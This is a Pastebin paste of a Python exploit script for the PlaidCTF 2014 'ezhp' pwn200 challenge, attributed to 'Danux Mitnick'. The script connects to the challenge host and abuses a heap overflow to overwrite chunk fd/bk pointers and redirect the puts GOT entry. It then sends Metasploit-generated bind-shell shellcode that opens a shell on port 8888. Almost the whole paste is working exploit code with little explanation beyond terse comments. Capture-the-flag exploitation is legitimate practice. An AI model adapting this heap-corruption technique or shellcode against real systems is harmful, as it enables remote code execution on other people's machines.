SHARE
TWEET

pwn200 ezhp by Danux

a guest Apr 15th, 2014 232 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Author: Danux Mitnick
  2. #Description: Pwn200 PlaidCTF 2014
  3. #Date: Apr 13th 2014
  4.  
  5. import socket, time, struct
  6.  
  7. def sock_recv(s, n):
  8.   time.sleep(0.25)
  9.   b = s.recv(n)
  10.   print b
  11.   return b
  12.  
  13. def DoData(s, data):
  14.   s.send(data)
  15.   b = sock_recv(s,8096)
  16.  
  17. def DoRun(s,n):
  18.   s.send('%d\n'%n)
  19.   b = sock_recv(s, 1024)
  20.   return b
  21.  
  22. s = socket.socket()
  23. s.connect(('54.81.149.239', 9174))#54.81.149.239:9174
  24. raw_input('Attach process with gdb here')
  25. b = sock_recv(s, 1024)
  26.  
  27. DoRun(s,1) #id 0
  28. DoRun(s,256)
  29. DoRun(s,1) #id 1
  30. DoRun(s,256)
  31. DoRun(s,1) #id 2
  32. DoRun(s,256)
  33. DoRun(s,3) #change note
  34. DoRun(s,1) #id 1
  35. DoRun(s,276)
  36. #Now input your dataa
  37. sizes = "\xfc\xff\xff\xff"*2
  38. fd = "\x08\xa0\x04\x08" # readelf --relocs ezhp ->0804a008 puts
  39. bk = "\x60\xa0\x04\x08" #chunk_buffers holding heap addresses
  40. sc = 'A'*260 + sizes + fd + bk
  41. DoData(s,sc) #overwrite fd and bd headers of chunk id 2
  42. DoRun(s,2) #id 2 - delete note of corrupted heap
  43. DoRun(s,2)
  44. DoRun(s,3) #change note
  45. DoRun(s,1) #id 1 -> Now is pointing to heap addresses buffer
  46. DoRun(s,256) #size
  47. #Now input your data
  48. sc = '\x0C\xa0\x04\x08' + "\x90"*10
  49. #msfpayload linux/x86/shell_bind_tcp LPORT=8888 P
  50. sc2 =(
  51. "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
  52. "\x80\x5b\x5e\x52\x68\x02\x00\x22\xb8\x6a\x10\x51\x50\x89"
  53. "\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd"
  54. "\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49"
  55. "\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
  56. "\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
  57. )
  58. sc = sc + sc2
  59.  
  60. DoData(s,sc) #overwrite stack at 0804a008 - 0x114  - puts
  61. DoRun(s,4) #id 1 - print note 1 which is pointing to overwriten put address
  62. DoRun(s,1)
  63.  
  64. "pwn200.py" 65L, 1706C                                                                                                                                                                                                     1,4           Top
RAW Paste Data
Want to get better at Python?
Learn to code Python in 2017
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top